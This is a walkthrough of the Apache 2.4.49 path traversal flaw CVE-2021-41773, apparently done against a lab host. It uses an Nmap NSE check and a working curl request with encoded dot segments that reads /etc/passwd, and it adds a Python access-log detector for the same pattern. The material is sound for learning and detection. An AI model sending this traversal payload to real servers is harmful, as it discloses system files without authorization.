Understanding CVE-2021-41773

A Path Traversal Vulnerability in Apache

Pathways to Danger: When URLs Take the Scenic Route

CVE-2021-41773 is a critical security flaw in Apache HTTP Server versions 2.4.49 and 2.4.50. It is a path traversal vulnerability: a change to path normalization mishandles percent-encoded dot segments in request URLs, so a crafted request can map to files outside the expected document root. Files that are not protected by a "require all denied" rule can be read, the source of interpreted files such as CGI scripts can be leaked, and the flaw can potentially lead to arbitrary code execution or disclosure of confidential data. Understanding and mitigating this vulnerability is essential for keeping a web server secure.

  • 1

    Download

    Download the NSE script (saved locally here as cve-2021-41773.nse) and move it into Nmap's script directory as /usr/share/nmap/scripts/http-vuln-cve2021-41773.nse, then refresh the script database:
    ❯ sudo mv cve-2021-41773.nse /usr/share/nmap/scripts/http-vuln-cve2021-41773.nse
    
    ❯ sudo nmap --script-updatedb
    NSE: Updating rule database.
    NSE: Script Database updated successfully.
  • 2

    Nmap Scan

    ❯ sudo nmap -sV -p 443 --script "http-vuln-cve2021-41773" 192.168.190.13
    Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-25 00:35 CDT
    Nmap scan report for 192.168.190.13
    Host is up (0.33s latency).
    
    PORT    STATE SERVICE VERSION
    443/tcp open  http    Apache httpd 2.4.49 ((Unix))
    |_http-server-header: Apache/2.4.49 (Unix)
    | http-vuln-cve2021-41773: 
    |   VULNERABLE:
    |   Path traversal and file disclosure vulnerability in Apache HTTP Server 2.4.49
    |     State: VULNERABLE
    |       	A flaw was found in a change made to path normalization in Apache HTTP Server 2.4.49. An attacker could use a path traversal attack to map URLs to files outside the expected document root. If files outside of the document root are not protected by "require all denied" these requests can succeed. Additionally this flaw could leak the source of interpreted files like CGI scripts. This issue is known to be exploited in the wild. This issue only affects Apache 2.4.49 and not earlier versions.
    |           
    |     Disclosure date: 2021-10-05
    |     Check results:
    |       
    |         Verify arbitrary file read: https://192.168.190.13:443/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
    |       
    |     References:
    |       https://nvd.nist.gov/vuln/detail/CVE-2021-41773
    |_      https://httpd.apache.org/security/vulnerabilities_24.html
    
    Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
    Nmap done: 1 IP address (1 host up) scanned in 10.75 seconds
  • 3

    Nmap prints a verification link; requesting it confirms the arbitrary file read:
    Verify arbitrary file read: https://192.168.190.13:443/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
    Use http, not https: the scan shows the service on port 443 is plain HTTP, so the request below is sent over http even though Nmap's link says https.

    ❯ curl http://192.168.190.13:443/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
    root:x:0:0:root:/root:/bin/bash
    daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
    bin:x:2:2:bin:/bin:/usr/sbin/nologin
    sys:x:3:3:sys:/dev:/usr/sbin/nologin
    sync:x:4:65534:sync:/bin:/bin/sync
    games:x:5:60:games:/usr/games:/usr/sbin/nologin
    man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
    lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
    mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
    news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
    uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
    proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
    www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
    backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
    list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
    irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
    gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
    nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
    systemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
    systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
    systemd-timesync:x:102:104:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
    messagebus:x:103:106::/nonexistent:/usr/sbin/nologin
    syslog:x:104:110::/home/syslog:/usr/sbin/nologin
    _apt:x:105:65534::/nonexistent:/usr/sbin/nologin
    tss:x:106:111:TPM software stack,,,:/var/lib/tpm:/bin/false
    uuidd:x:107:112::/run/uuidd:/usr/sbin/nologin
    tcpdump:x:108:113::/nonexistent:/usr/sbin/nologin
    landscape:x:109:115::/var/lib/landscape:/usr/sbin/nologin
    pollinate:x:110:1::/var/cache/pollinate:/bin/false
    systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
    lxd:x:998:100::/var/snap/lxd/common/lxd:/bin/false
    alfred:x:1000:1000:,,,:/home/alfred:/bin/bash
    sshd:x:111:65534::/run/sshd:/usr/sbin/nologin
    0110b6e27a4893fe36fa97db5941daa4:x:1001:1001::/tmp/:/bin/sh
    
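As an added, defender-side example (not from the original post): a small Python detector that applies the decode-then-normalize order the 2.4.49 normalizer got wrong to request paths from Apache access logs, flagging the .%2e / %2e%2e traversal seen above while leaving benign percent-encoded filenames alone. The log lines, client IPs and timestamps are constructed samples.

```python
import re
from urllib.parse import unquote

# Request line inside an Apache Combined Log Format entry: "METHOD PATH HTTP/x.y"
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<path>\S+) HTTP/[\d.]+"')

# Constructed sample log lines (not real traffic); client IPs are documentation-range placeholders.
SAMPLE_LOG = [
    '203.0.113.7 - - [25/May/2024:00:36:01 -0500] "GET /index.html HTTP/1.1" 200 1043',
    '203.0.113.7 - - [25/May/2024:00:36:05 -0500] "GET /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1" 200 2311',
    '198.51.100.2 - - [25/May/2024:00:36:09 -0500] "GET /docs/../index.html HTTP/1.1" 200 1043',
    '198.51.100.2 - - [25/May/2024:00:36:12 -0500] "GET /files/report%2ev2.pdf HTTP/1.1" 200 8820',
    '198.51.100.2 - - [25/May/2024:00:36:15 -0500] "GET /icons/%2e%2e/%2e%2e/etc/hosts HTTP/1.1" 404 196',
]

def decoded_segments(path):
    """Percent-decode first, then split into segments, so '.%2e' and '%2e%2e'
    are seen as the '..' they are. Decoding repeats (capped) to also catch
    doubly encoded dots; a normal path stops changing after one pass."""
    decoded = path.split("?", 1)[0]
    for _ in range(3):
        again = unquote(decoded)
        if again == decoded:
            break
        decoded = again
    return [seg for seg in decoded.split("/") if seg]

def escapes_docroot(path):
    """True if the decoded path climbs above the document root. The 2.4.49
    normalizer let percent-encoded dots slip past exactly this check, so a
    detector must decode before it counts '..' segments."""
    depth = 0
    for seg in decoded_segments(path):
        if seg == "..":
            depth -= 1
            if depth < 0:
                return True
        elif seg != ".":
            depth += 1
    return False

def flag_traversal(log_lines):
    """Return (client_ip, raw_path) for each logged request that escapes the docroot."""
    hits = []
    for line in log_lines:
        match = REQUEST_RE.search(line)
        if match and escapes_docroot(match.group("path")):
            hits.append((line.split()[0], match.group("path")))
    return hits
```

Feed the lines of a real access log to flag_traversal to review past traffic; the curl request from step 3 is logged with its raw request line, so it would match the second sample entry.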

Ready, enjoy.